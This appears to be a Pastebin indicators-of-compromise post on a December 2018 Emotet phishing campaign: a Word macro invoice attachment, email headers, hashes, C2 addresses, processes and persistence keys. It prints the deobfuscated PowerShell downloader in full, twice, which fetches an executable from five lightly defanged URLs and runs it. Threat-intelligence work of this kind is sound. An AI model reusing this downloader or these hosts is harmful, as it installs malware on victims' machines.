Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- #IOC #OptiData #VR #emotet #feodo #W97M #powershell
- https://pastebin.com/EejcbL4t
- previous contact:
- 04/12/18 https://pastebin.com/znQDtbnt
- 09/11/18 https://pastebin.com/THHMs2wg
- 01/10/18 https://pastebin.com/Y6DnbpHv
- FAQ:
- https://radetskiy.wordpress.com/2018/10/19/ioc_emotet_011018/
- https://kc.mcafee.com/corporate/index?page=content&id=KB90108
- attack_vector
- --------------
- email attach .doc > macro > cmd > powershell > GET 5 URL > %temp%\***.exe
- email_headers
- --------------
- Received: from server.arroyo.bz (server.arroyo.bz [65.60.8.150])
- by srv8.victim1.com for <user0@org7.kv.victim1.com>;
- Thu, 20 Dec 2018 20:00:26 +0200 (EET)
- (envelope-from veronicat@mccell.com.mx)
- Received: from [138.122.96.73] (port=56726 helo=10.15.31.100)
- by server.arroyo.bz (Exim 4.91)
- for user0@org7.kv.victim1.com; Thu, 20 Dec 2018 12:00:07 -0600
- Date: Thu, 20 Dec 2018 12:00:40 -0600
- From: Вячеслав Прендзевский <prom@pride-ukraine.com.ua> <veronicat@mccell.com.mx>
- To: user0@org7.kv.victim1.com
- Subject: Вячеслав Прендзевский - Invoice 85841
- files
- --------------
- SHA-256 bf0d01d08d9ef9677f697e2e574429a72003319335616274510556c80c9a0a80
- File name Inv85841.doc
- File size 144.5 KB
- SHA-256 270d94b84b2acafeb682d975ecd076e96fe7892a095cd420b13eb1f54cc63fc1
- File name pEakCmvuBiB.exe
- File size 536 KB
- activity
- **************
- deobfuscated_macro
- --------------
- powershell $o497='G112';$E633=new-object Net.WebClient;$Q470='http://opewinsng {.}com/bOiANyEc@http://chamanga {.} org {.}uy/eE9DiHE6@http://ideagold {.}by/rzb6hSlC3@http://onetechblog{.} tek1{.} top/MyZztFl@http://maxclean{.} srv {.}br/QVtDDcAZ'.Split('@');$c691='w246';$V107 = '583';$U974='p613';$B338=$env:temp+'\'+$V107+'.exe';foreach($o680 in $Q470){try{$E633.DownloadFile($o680, $B338);$j643='Z181';If ((Get-Item $B338).length -ge 80000) {Invoke-Item $B338;$a636='Y317';break;}}catch{}}$k418='W330';
- pl_src: 1/5
- --------------
- h11p:\ opewinsng {.}com/bOiANyEc 404
- h11p:\ chamanga {.} org {.}uy/eE9DiHE6 200
- h11p:\ ideagold {.}by/rzb6hSlC3 403
- h11p:\ onetechblog{.} tek1{.} top/MyZztFl 403
- h11p:\ maxclean{.} srv {.}br/QVtDDcAZ 404
- C2:
- --------------
- http://189.226.214.129:8080/
- netwrk
- --------------
- 1.22.119.250 1.22.119.250 GET / HTTP/1.1 Mozilla/4.0
- comp
- --------------
- stgintel.exe 2224 189.226.214.129 8080 SYN_SENT
- stgintel.exe 2224 200.124.225.32 80 SYN_SENT
- stgintel.exe 2224 70.80.135.35 8443 SYN_SENT
- stgintel.exe 2224 201.102.7.208 8443 SYN_SENT
- stgintel.exe 2224 189.222.245.247 80 SYN_SENT
- stgintel.exe 2224 1.22.119.250 80 ESTABLISHED
- proc
- --------------
- "C:\Program Files (x86)\Microsoft Office\Office12\WINWORD.EXE" /n /dde
- c:\c556902829965\u3692599496166\i47356399652\..\..\..\windows\system32\cmd.exe /c %PrOgraMdatA:...
- CmD /V: /R " seT gali=;'033W'=814k$}}{hctac}};kaerb;'713Y'=636a$;833B$ metI-ekovnI{ )00008...
- C:\Windows\system32\cmd.exe /S /D /c" EchO pow%PUBLIC:~5,1%r%SESSIONNAME:...
- Cmd.EXe
- powershell $o497='G112';$E633=new-object Net.WebClient;$Q470='http://opewinsng {.}com/bOiANyEc@http://chamanga {.} org {.}uy/eE9DiHE6@http://ideagold {.}by/rzb6hSlC3@http://onetechblog{.} tek1{.} top/MyZztFl@http://maxclean{.} srv {.}br/QVtDDcAZ'.Split('@');$c691='w246';$V107 = '583';$U974='p613';$B338=$env:temp+'\'+$V107+'.exe';foreach($o680 in $Q470){try{$E633.DownloadFile($o680, $B338);$j643='Z181';If ((Get-Item $B338).length -ge 80000) {Invoke-Item $B338;$a636='Y317';break;}}catch{}}$k418='W330';
- C:\tmp\583.exe
- C:\Users\operator\AppData\Local\stgintel\stgintel.exe
- persist
- --------------
- HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 23.12.2018 13:19
- stgintel
- TortoisePlink http://tortoisesvn.net
- c:\users\operator\appdata\local\stgintel\stgintel.exe 22.12.2018 16:05
- drop
- --------------
- C:\tmp\583.exe
- C:\Users\operator\AppData\Local\stgintel\stgintel.exe
- VR
- # # #
- https://www.virustotal.com/#/file/bf0d01d08d9ef9677f697e2e574429a72003319335616274510556c80c9a0a80/details
- https://www.virustotal.com/#/file/270d94b84b2acafeb682d975ecd076e96fe7892a095cd420b13eb1f54cc63fc1/details
- https://analyze.intezer.com/#/analyses/9142da6d-ba72-4ff1-a515-5b187735a162
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement